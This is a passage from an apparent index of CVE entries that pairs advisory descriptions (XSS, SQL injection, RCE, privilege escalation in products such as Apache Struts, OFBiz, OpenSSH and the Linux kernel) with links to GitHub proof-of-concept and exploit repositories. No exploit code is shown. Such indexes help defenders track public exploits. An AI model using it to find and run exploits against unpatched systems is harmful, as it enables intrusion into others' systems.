Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/category. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the category parameter.

- [geraldoalcantara/CVE-2023-49539](https://github.com/geraldoalcantara/CVE-2023-49539)

### CVE-2023-49540 (2024-03-01)

Book Store Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /bsms_ci/index.php/history. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the history parameter.

- [geraldoalcantara/CVE-2023-49540](https://github.com/geraldoalcantara/CVE-2023-49540)

### CVE-2023-49543 (2024-03-01)

Incorrect access control in Book Store Management System v1 allows attackers to access unauthorized pages and execute administrative functions without authenticating.

- [geraldoalcantara/CVE-2023-49543](https://github.com/geraldoalcantara/CVE-2023-49543)

### CVE-2023-49544 (2024-03-01)

A local file inclusion (LFI) in Customer Support System v1 allows attackers to include internal PHP files and gain unauthorized access via manipulation of the page= parameter at /customer_support/index.php.

- [geraldoalcantara/CVE-2023-49544](https://github.com/geraldoalcantara/CVE-2023-49544)

### CVE-2023-49545 (2024-03-01)

A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization.

- [geraldoalcantara/CVE-2023-49545](https://github.com/geraldoalcantara/CVE-2023-49545)

### CVE-2023-49546 (2024-03-04)

Customer Support System v1 was discovered to contain a SQL injection vulnerability via the email parameter at /customer_support/ajax.php.

- [geraldoalcantara/CVE-2023-49546](https://github.com/geraldoalcantara/CVE-2023-49546)

### CVE-2023-49547 (2024-03-04)

Customer Support System v1 was discovered to contain a SQL injection vulnerability via the username parameter at /customer_support/ajax.php?action=login.

- [geraldoalcantara/CVE-2023-49547](https://github.com/geraldoalcantara/CVE-2023-49547)

### CVE-2023-49548 (2024-03-04)

Customer Support System v1 was discovered to contain a SQL injection vulnerability via the lastname parameter at /customer_support/ajax.php?action=save_user.

- [geraldoalcantara/CVE-2023-49548](https://github.com/geraldoalcantara/CVE-2023-49548)

### CVE-2023-49606 (2024-05-01)

A use-after-free vulnerability exists in the HTTP Connection Headers parsing in Tinyproxy 1.11.1 and Tinyproxy 1.10.0. A specially crafted HTTP header can trigger reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. An attacker needs to make an unauthenticated HTTP request to trigger this vulnerability.

- [d0rb/CVE-2023-49606](https://github.com/d0rb/CVE-2023-49606)

### CVE-2023-49950 (2024-02-03)

The Jinja templating in Logpoint SIEM 6.10.0 through 7.x before 7.3.0 does not correctly sanitize log data being displayed when using a custom Jinja template in the Alert view. A remote attacker can craft a cross-site scripting (XSS) payload and send it to any system or device that sends logs to the SIEM. If an alert is created, the payload will execute upon the alert data being viewed with that template, which can lead to sensitive data disclosure.

- [shrikeinfosec/cve-2023-49950](https://github.com/shrikeinfosec/cve-2023-49950)

### CVE-2023-49954 (2023-12-25)

The CRM Integration in 3CX before 18.0.9.23 and 20 before 20.0.0.1494 allows SQL Injection via a first name, search string, or email address.

- [CVE-2023-49954/CVE-2023-49954.github.io](https://github.com/CVE-2023-49954/CVE-2023-49954.github.io)

### CVE-2023-49964 (2023-12-11)

An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873.

- [mbadanoiu/CVE-2023-49964](https://github.com/mbadanoiu/CVE-2023-49964)

### CVE-2023-49965 (2024-04-05)

SpaceX Starlink Wi-Fi router Gen 2 before 2023.48.0 allows XSS via the ssid and password parameters on the Setup Page.

- [yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS](https://github.com/yoshida-git-ai/SpaceX-Starlink-Router-Gen-2-XSS)

### CVE-2023-49968 (2024-03-04)

Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/manage_department.php.

- [geraldoalcantara/CVE-2023-49968](https://github.com/geraldoalcantara/CVE-2023-49968)

### CVE-2023-49969 (2024-03-04)

Customer Support System v1 was discovered to contain a SQL injection vulnerability via the id parameter at /customer_support/index.php?page=edit_customer.

- [geraldoalcantara/CVE-2023-49969](https://github.com/geraldoalcantara/CVE-2023-49969)

### CVE-2023-49970 (2024-03-04)

Customer Support System v1 was discovered to contain a SQL injection vulnerability via the subject parameter at /customer_support/ajax.php?action=save_ticket.

- [geraldoalcantara/CVE-2023-49970](https://github.com/geraldoalcantara/CVE-2023-49970)

### CVE-2023-49971 (2024-03-06)

A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter at /customer_support/index.php?page=customer_list.

- [geraldoalcantara/CVE-2023-49971](https://github.com/geraldoalcantara/CVE-2023-49971)

### CVE-2023-49973 (2024-03-06)

A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter at /customer_support/index.php?page=customer_list.

- [geraldoalcantara/CVE-2023-49973](https://github.com/geraldoalcantara/CVE-2023-49973)

### CVE-2023-49974 (2024-03-06)

A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the contact parameter at /customer_support/index.php?page=customer_list.

- [geraldoalcantara/CVE-2023-49974](https://github.com/geraldoalcantara/CVE-2023-49974)

### CVE-2023-49976 (2024-03-06)

A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the subject parameter at /customer_support/index.php?page=new_ticket.

- [geraldoalcantara/CVE-2023-49976](https://github.com/geraldoalcantara/CVE-2023-49976)

### CVE-2023-49977 (2024-03-06)

A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the address parameter at /customer_support/index.php?page=new_customer.

- [geraldoalcantara/CVE-2023-49977](https://github.com/geraldoalcantara/CVE-2023-49977)

### CVE-2023-49978 (2024-03-06)

Incorrect access control in Customer Support System v1 allows non-administrator users to access administrative pages and execute actions reserved for administrators.

- [geraldoalcantara/CVE-2023-49978](https://github.com/geraldoalcantara/CVE-2023-49978)

### CVE-2023-49979 (2024-03-06)

A directory listing vulnerability in Customer Support System v1 allows attackers to list directories and sensitive files within the application without requiring authorization.

- [geraldoalcantara/CVE-2023-49979](https://github.com/geraldoalcantara/CVE-2023-49979)

### CVE-2023-49980 (2024-03-06)

A directory listing vulnerability in Best Student Result Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization.

- [geraldoalcantara/CVE-2023-49980](https://github.com/geraldoalcantara/CVE-2023-49980)

### CVE-2023-49981 (2024-03-06)

A directory listing vulnerability in School Fees Management System v1.0 allows attackers to list directories and sensitive files within the application without requiring authorization.

- [geraldoalcantara/CVE-2023-49981](https://github.com/geraldoalcantara/CVE-2023-49981)

### CVE-2023-49982 (2024-03-06)

Broken access control in the component /admin/management/users of School Fees Management System v1.0 allows attackers to escalate privileges and perform Administrative actions, including adding and deleting user accounts.

- [geraldoalcantara/CVE-2023-49982](https://github.com/geraldoalcantara/CVE-2023-49982)

### CVE-2023-49983 (2024-03-06)

A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.

- [geraldoalcantara/CVE-2023-49983](https://github.com/geraldoalcantara/CVE-2023-49983)

### CVE-2023-49984 (2024-03-06)

A cross-site scripting (XSS) vulnerability in the component /management/settings of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.

- [geraldoalcantara/CVE-2023-49984](https://github.com/geraldoalcantara/CVE-2023-49984)

### CVE-2023-49985 (2024-03-06)

A cross-site scripting (XSS) vulnerability in the component /management/class of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the cname parameter.

- [geraldoalcantara/CVE-2023-49985](https://github.com/geraldoalcantara/CVE-2023-49985)

### CVE-2023-49986 (2024-03-07)

A cross-site scripting (XSS) vulnerability in the component /admin/parent of School Fees Management System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter.

- [geraldoalcantara/CVE-2023-49986](https://github.com/geraldoalcantara/CVE-2023-49986)

### CVE-2023-49987 (2024-03-07)

A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter.

- [geraldoalcantara/CVE-2023-49987](https://github.com/geraldoalcantara/CVE-2023-49987)

### CVE-2023-49988 (2024-03-07)

Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the npss parameter at rooms.php.

- [geraldoalcantara/CVE-2023-49988](https://github.com/geraldoalcantara/CVE-2023-49988)

### CVE-2023-49989 (2024-03-07)

Hotel Booking Management v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at update.php.

- [geraldoalcantara/CVE-2023-49989](https://github.com/geraldoalcantara/CVE-2023-49989)

### CVE-2023-50029 (2024-06-24)

PHP Injection vulnerability in the module "M4 PDF Extensions" (m4pdf) up to version 3.3.2 from PrestaAddons for PrestaShop allows attackers to run arbitrary code via the M4PDF::saveTemplate() method.

- [absholi7ly/PHP-Injection-in-M4-PDF-Extensions](https://github.com/absholi7ly/PHP-Injection-in-M4-PDF-Extensions)

### CVE-2023-50070 (2023-12-29)

Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket via department_id, customer_id, and subject.

- [geraldoalcantara/CVE-2023-50070](https://github.com/geraldoalcantara/CVE-2023-50070)

### CVE-2023-50071 (2023-12-29)

Sourcecodester Customer Support System 1.0 has multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department via id or name.

- [geraldoalcantara/CVE-2023-50071](https://github.com/geraldoalcantara/CVE-2023-50071)

### CVE-2023-50072 (2024-01-13)

A Stored Cross-Site Scripting (XSS) vulnerability exists in OpenKM version 7.1.40 (dbb6e88) with Professional Extension that allows an authenticated user to upload a note on a file which acts as a stored XSS payload. Any user who opens the note of a document file will trigger the XSS.

- [ahrixia/CVE-2023-50072](https://github.com/ahrixia/CVE-2023-50072)

### CVE-2023-50131
- [sajaljat/CVE-2023-50131](https://github.com/sajaljat/CVE-2023-50131)

### CVE-2023-50132
- [sajaljat/CVE-2023-50132](https://github.com/sajaljat/CVE-2023-50132)

### CVE-2023-50164 (2023-12-07)

An attacker can manipulate file upload params to enable path traversal, and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.
Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.

- [minhbao15677/CVE-2023-50164](https://github.com/minhbao15677/CVE-2023-50164)
- [jakabakos/CVE-2023-50164-Apache-Struts-RCE](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
- [bcdannyboy/CVE-2023-50164](https://github.com/bcdannyboy/CVE-2023-50164)
- [dwisiswant0/cve-2023-50164-poc](https://github.com/dwisiswant0/cve-2023-50164-poc)
- [helsecert/cve-2023-50164](https://github.com/helsecert/cve-2023-50164)
- [Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE](https://github.com/Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE)
- [Trackflaw/CVE-2023-50164-ApacheStruts2-Docker](https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker)
- [miles3719/cve-2023-50164](https://github.com/miles3719/cve-2023-50164)
- [aaronm-sysdig/cve-2023-50164](https://github.com/aaronm-sysdig/cve-2023-50164)
- [snyk-labs/CVE-2023-50164-POC](https://github.com/snyk-labs/CVE-2023-50164-POC)
- [sunnyvale-it/CVE-2023-50164-PoC](https://github.com/sunnyvale-it/CVE-2023-50164-PoC)
- [AsfandAliMemon25/CVE-2023-50164Analysis-](https://github.com/AsfandAliMemon25/CVE-2023-50164Analysis-)
- [NikitaPark/CVE-2023-50164-PoC](https://github.com/NikitaPark/CVE-2023-50164-PoC)

### CVE-2023-50226 (2024-05-03)

Parallels Desktop Updater Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute low-privileged code on the target host system in order to exploit this vulnerability.

The specific flaw exists within the Updater service. By creating a symbolic link, an attacker can abuse the service to move arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root. Was ZDI-CAN-21227.

- [kn32/parallels-file-move-privesc](https://github.com/kn32/parallels-file-move-privesc)

### CVE-2023-50245 (2023-12-11)

OpenEXR-viewer is a viewer for OpenEXR files with detailed metadata probing. Versions prior to 0.6.1 have a memory overflow vulnerability. This issue is fixed in version 0.6.1.

- [200101WhoAmI/CVE-2023-50245](https://github.com/200101WhoAmI/CVE-2023-50245)

### CVE-2023-50254 (2023-12-22)

Deepin Linux's default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue.

- [febinrev/deepin-linux_reader_RCE-exploit](https://github.com/febinrev/deepin-linux_reader_RCE-exploit)

### CVE-2023-50386 (2024-02-09)

Improper Control of Dynamically-Managed Code Resources, Unrestricted Upload of File with Dangerous Type, Inclusion of Functionality from Untrusted Control Sphere vulnerability in Apache Solr. This issue affects Apache Solr: from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1.

In the affected versions, Solr ConfigSets accepted Java jar and class files to be uploaded through the ConfigSets API.
When backing up Solr Collections, these configSet files would be saved to disk when using the LocalFileSystemRepository (the default for backups).
If the backup was saved to a directory that Solr uses in its ClassPath/ClassLoaders, then the jar and class files would be available to use with any ConfigSet, trusted or untrusted.

When Solr is run in a secure way (Authorization enabled), as is strongly suggested, this vulnerability is limited to extending the Backup permissions with the ability to add libraries.
Users are recommended to upgrade to version 8.11.3 or 9.4.1, which fix the issue.
In these versions, the following protections have been added:

- Users are no longer able to upload files to a configSet that could be executed via a Java ClassLoader.
- The Backup API restricts saving backups to directories that are used in the ClassLoader.

- [vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC](https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC)

### CVE-2023-50387 (2024-02-14)

Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.

- [knqyf263/CVE-2023-50387](https://github.com/knqyf263/CVE-2023-50387)
- [Meirelez/SSR-DNSSEC](https://github.com/Meirelez/SSR-DNSSEC)

### CVE-2023-50465 (2023-12-11)

A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.

- [Ev3rR3d/CVE-2023-50465](https://github.com/Ev3rR3d/CVE-2023-50465)

### CVE-2023-50564 (2023-12-14)

An arbitrary file upload vulnerability in the component /inc/modules_install.php of Pluck-CMS v4.7.18 allows attackers to execute arbitrary code via uploading a crafted ZIP file.

- [Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC](https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC)
- [ipuig/CVE-2023-50564](https://github.com/ipuig/CVE-2023-50564)
- [rwexecute/CVE-2023-50564](https://github.com/rwexecute/CVE-2023-50564)
- [thefizzyfish/CVE-2023-50564-pluck](https://github.com/thefizzyfish/CVE-2023-50564-pluck)
- [Mrterrestrial/CVE-2023-50564](https://github.com/Mrterrestrial/CVE-2023-50564)
- [TanveerS1ngh/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564](https://github.com/TanveerS1ngh/Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564)

### CVE-2023-50596
- [chandraprarikraj/CVE-2023-50596](https://github.com/chandraprarikraj/CVE-2023-50596)

### CVE-2023-50643 (2024-01-09)

An issue in Evernote Evernote for MacOS v.10.68.2 allows a remote attacker to execute arbitrary code via the RunAsNode and EnableNodeCliInspectArguments components.

- [giovannipajeu1/CVE-2023-50643](https://github.com/giovannipajeu1/CVE-2023-50643)

### CVE-2023-50685 (2024-05-02)

An issue in Hipcam Cameras RealServer v.1.0 allows a remote attacker to cause a denial of service via a crafted script to the client_port parameter.

- [UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability](https://github.com/UnderwaterCoder/Hipcam-RTSP-Format-Validation-Vulnerability)

### CVE-2023-50868 (2024-02-14)

The Closest Encloser Proof aspect of the DNS protocol (in RFC 5155 when RFC 9276 guidance is skipped) allows remote attackers to cause a denial of service (CPU consumption for SHA-1 computations) via DNSSEC responses in a random subdomain attack, aka the "NSEC3" issue. The RFC 5155 specification implies that an algorithm must perform thousands of iterations of a hash function in certain situations.

- [Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack](https://github.com/Goethe-Universitat-Cybersecurity/NSEC3-Encloser-Attack)

### CVE-2023-50917 (2023-12-15)

MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager.

- [Chocapikk/CVE-2023-50917](https://github.com/Chocapikk/CVE-2023-50917)

### CVE-2023-51000
- [Team-Byerus/CVE-2023-51000](https://github.com/Team-Byerus/CVE-2023-51000)

### CVE-2023-51073 (2024-01-11)

An issue in Buffalo LS210D v.1.78-0.03 allows a remote attacker to execute arbitrary code via the Firmware Update Script at /etc/init.d/update_notifications.sh.

- [christopher-pace/CVE-2023-51073](https://github.com/christopher-pace/CVE-2023-51073)

### CVE-2023-51119
- [OscarAkaElvis/CVE-2023-51119](https://github.com/OscarAkaElvis/CVE-2023-51119)

### CVE-2023-51126 (2024-01-10)

Command injection vulnerability in /usr/www/res.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.

- [risuxx/CVE-2023-51126](https://github.com/risuxx/CVE-2023-51126)

### CVE-2023-51127 (2024-01-10)

FLIR AX8 thermal sensor cameras up to and including 1.46.16 are vulnerable to Directory Traversal due to improper access restriction. This vulnerability allows an unauthenticated, remote attacker to obtain arbitrary sensitive file contents by uploading a specially crafted symbolic link file.

- [risuxx/CVE-2023-51127](https://github.com/risuxx/CVE-2023-51127)

### CVE-2023-51214
- [chandraprarikraj/CVE-2023-51214](https://github.com/chandraprarikraj/CVE-2023-51214)

### CVE-2023-51281 (2024-03-07)

Cross Site Scripting vulnerability in Customer Support System v.1.0 allows a remote attacker to escalate privileges via a crafted script in the firstname, lastname, middlename, contact and address parameters.

- [geraldoalcantara/CVE-2023-51281](https://github.com/geraldoalcantara/CVE-2023-51281)

### CVE-2023-51385 (2023-12-18)

In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.

- [vin01/poc-proxycommand-vulnerable](https://github.com/vin01/poc-proxycommand-vulnerable)
- [FeatherStark/CVE-2023-51385](https://github.com/FeatherStark/CVE-2023-51385)
- [watarium/poc-cve-2023-51385](https://github.com/watarium/poc-cve-2023-51385)
- [Le1a/CVE-2023-51385](https://github.com/Le1a/CVE-2023-51385)
- [LtmThink/CVE-2023-51385_test](https://github.com/LtmThink/CVE-2023-51385_test)
- [WLaoDuo/CVE-2023-51385_poc-test](https://github.com/WLaoDuo/CVE-2023-51385_poc-test)
- [power1314520/CVE-2023-51385_test](https://github.com/power1314520/CVE-2023-51385_test)
- [WOOOOONG/CVE-2023-51385](https://github.com/WOOOOONG/CVE-2023-51385)
- [uccu99/CVE-2023-51385](https://github.com/uccu99/CVE-2023-51385)
- [julienbrs/exploit-CVE-2023-51385](https://github.com/julienbrs/exploit-CVE-2023-51385)
- [julienbrs/malicious-exploit-CVE-2023-51385](https://github.com/julienbrs/malicious-exploit-CVE-2023-51385)
- [Sonicrrrr/CVE-2023-51385](https://github.com/Sonicrrrr/CVE-2023-51385)
- [farliy-hacker/CVE-2023-51385](https://github.com/farliy-hacker/CVE-2023-51385)
- [farliy-hacker/CVE-2023-51385-save](https://github.com/farliy-hacker/CVE-2023-51385-save)
- [2048JiaLi/CVE-2023-51385](https://github.com/2048JiaLi/CVE-2023-51385)
- [thinkliving2020/CVE-2023-51385-](https://github.com/thinkliving2020/CVE-2023-51385-)
- [c0deur/CVE-2023-51385](https://github.com/c0deur/CVE-2023-51385)
- [endasugrue/CVE-2023-51385_poc](https://github.com/endasugrue/CVE-2023-51385_poc)
- [MiningBot-eth/CVE-2023-51385-exploit](https://github.com/MiningBot-eth/CVE-2023-51385-exploit)
- [Featherw1t/CVE-2023-51385_test](https://github.com/Featherw1t/CVE-2023-51385_test)

### CVE-2023-51409 (2024-04-12)

Unrestricted Upload of File with Dangerous Type vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot. This issue affects AI Engine: ChatGPT Chatbot: from n/a through 1.9.98.

- [RandomRobbieBF/CVE-2023-51409](https://github.com/RandomRobbieBF/CVE-2023-51409)

### CVE-2023-51448 (2023-12-22)

Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `managers.php`. An authenticated attacker with the "Settings/Utilities" permission can send a crafted HTTP GET request to the endpoint `/cacti/managers.php` with an SQLi payload in the `selected_graphs_array` HTTP GET parameter. As of time of publication, no patched versions exist.

- [jakabakos/CVE-2023-51448-cacti-sqli-poc](https://github.com/jakabakos/CVE-2023-51448-cacti-sqli-poc)

### CVE-2023-51467 (2023-12-26)

The vulnerability permits attackers to circumvent authentication processes, enabling them to remotely execute arbitrary code.

- [JaneMandy/CVE-2023-51467](https://github.com/JaneMandy/CVE-2023-51467)
- [Chocapikk/CVE-2023-51467](https://github.com/Chocapikk/CVE-2023-51467)
- [K3ysTr0K3R/CVE-2023-51467-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-51467-EXPLOIT)
- [jakabakos/Apache-OFBiz-Authentication-Bypass](https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass)
- [Subha-BOO7/Exploit_CVE-2023-51467](https://github.com/Subha-BOO7/Exploit_CVE-2023-51467)
- [JaneMandy/CVE-2023-51467-Exploit](https://github.com/JaneMandy/CVE-2023-51467-Exploit)
- [vulncheck-oss/cve-2023-51467](https://github.com/vulncheck-oss/cve-2023-51467)
- [2ptr/BadBizness-CVE-2023-51467](https://github.com/2ptr/BadBizness-CVE-2023-51467)
- [AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-](https://github.com/AhmedMansour93/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-)

### CVE-2023-51504 (2024-02-05)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan Dulaney Dan's Embedder for Google Calendar allows Stored XSS. This issue affects Dan's Embedder for Google Calendar: from n/a through 1.2.

- [Sybelle03/CVE-2023-51504](https://github.com/Sybelle03/CVE-2023-51504)

### CVE-2023-51518 (2024-02-27)

Apache James prior to version 3.7.5 and 3.8.0 exposes a JMX endpoint on localhost subject to pre-authentication deserialisation of untrusted data.
Given a deserialisation gadget, this could be leveraged as part of an exploit chain that could result in privilege escalation.
Note that by default the JMX endpoint is only bound locally.

We recommend users to:

- Upgrade to a non-vulnerable Apache James version
- Run Apache James isolated from other processes (docker - dedicated virtual machine)
- If possible turn off JMX

- [mbadanoiu/CVE-2023-51518](https://github.com/mbadanoiu/CVE-2023-51518)

### CVE-2023-51764 (2023-12-24)

Postfix through 3.8.5 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required, such as the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9.

- [duy-31/CVE-2023-51764](https://github.com/duy-31/CVE-2023-51764)
- [eeenvik1/CVE-2023-51764](https://github.com/eeenvik1/CVE-2023-51764)
- [d4op/CVE-2023-51764-POC](https://github.com/d4op/CVE-2023-51764-POC)
- [Double-q1015/CVE-2023-51764](https://github.com/Double-q1015/CVE-2023-51764)

### CVE-2023-51800 (2024-02-29)

Cross Site Scripting (XSS) vulnerability in School Fees Management System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the main_settings component in the phone, address, bank, acc_name, acc_number parameters, new_class and cname parameter, add_new_parent function in the name email parameters, new_term function in the tname parameter, and the edit_student function in the name parameter.

- [geraldoalcantara/CVE-2023-51800](https://github.com/geraldoalcantara/CVE-2023-51800)

### CVE-2023-51801 (2024-02-29)

SQL Injection vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the id parameter in the student_form.php and the class_form.php pages.

- [geraldoalcantara/CVE-2023-51801](https://github.com/geraldoalcantara/CVE-2023-51801)

### CVE-2023-51802 (2024-02-29)

Cross Site Scripting (XSS) vulnerability in the Simple Student Attendance System v.1.0 allows a remote attacker to execute arbitrary code via a crafted payload to the page or class_month parameter in the /php-attendance/attendance_report component.

- [geraldoalcantara/CVE-2023-51802](https://github.com/geraldoalcantara/CVE-2023-51802)

### CVE-2023-51810 (2024-01-16)

SQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module.

- [Pastea/CVE-2023-51810](https://github.com/Pastea/CVE-2023-51810)

### CVE-2023-52160 (2024-02-22)

The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks.

- [Helica-core/eap_pwn](https://github.com/Helica-core/eap_pwn)

### CVE-2023-52251 (2024-01-25)

An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.

- [BobTheShoplifter/CVE-2023-52251-POC](https://github.com/BobTheShoplifter/CVE-2023-52251-POC)

### CVE-2023-52268
- [squ1dw3rm/CVE-2023-52268](https://github.com/squ1dw3rm/CVE-2023-52268)

### CVE-2023-52654 (2024-05-09)

In the Linux kernel, the following vulnerability has been resolved: io_uring/af_unix: disable sending io_uring over sockets. File reference cycles have caused lots of problems for io_uring in the past, and it still doesn't work exactly right and races with unix_stream_read_generic(). The safest fix would be to completely disallow sending io_uring files via sockets via SCM_RIGHT, so there are no possible cycles involving registered files and thus rendering SCM accounting on the io_uring side unnecessary.

- [FoxyProxys/CVE-2023-52654](https://github.com/FoxyProxys/CVE-2023-52654)

### CVE-2023-52709
- [KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC](https://github.com/KevinMitchell-OSWP-CISSP/CVE-2023-52709-PoC)

## 2022
### CVE-2022-0155 (2022-01-10)

follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor

- [coana-tech/CVE-2022-0155-PoC](https://github.com/coana-tech/CVE-2022-0155-PoC)

### CVE-2022-0165 (2022-03-14)

The Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users

- [K3ysTr0K3R/CVE-2022-0165-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2022-0165-EXPLOIT)
- [Cappricio-Securities/CVE-2022-0165](https://github.com/Cappricio-Securities/CVE-2022-0165)

### CVE-2022-0185 (2022-02-11)

A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length. An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a filesystem that does not support the Filesystem Context API (and thus falls back to legacy handling) could use this flaw to escalate their privileges on the system.

- [Crusaders-of-Rust/CVE-2022-0185](https://github.com/Crusaders-of-Rust/CVE-2022-0185)
- [discordianfish/cve-2022-0185-crash-poc](https://github.com/discordianfish/cve-2022-0185-crash-poc)
- [khaclep007/CVE-2022-0185](https://github.com/khaclep007/CVE-2022-0185)
- [chenaotian/CVE-2022-0185](https://github.com/chenaotian/CVE-2022-0185)
- [veritas501/CVE-2022-0185-PipeVersion](https://github.com/veritas501/CVE-2022-0185-PipeVersion)
- [featherL/CVE-2022-0185-exploit](https://github.com/featherL/CVE-2022-0185-exploit)
- [dcheng69/CVE-2022-0185-Case-Study](https://github.com/dcheng69/CVE-2022-0185-Case-Study)

### CVE-2022-0219 (2022-01-20)

Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2.

- [Haxatron/CVE-2022-0219](https://github.com/Haxatron/CVE-2022-0219)

### CVE-2022-0236 (2022-01-18)

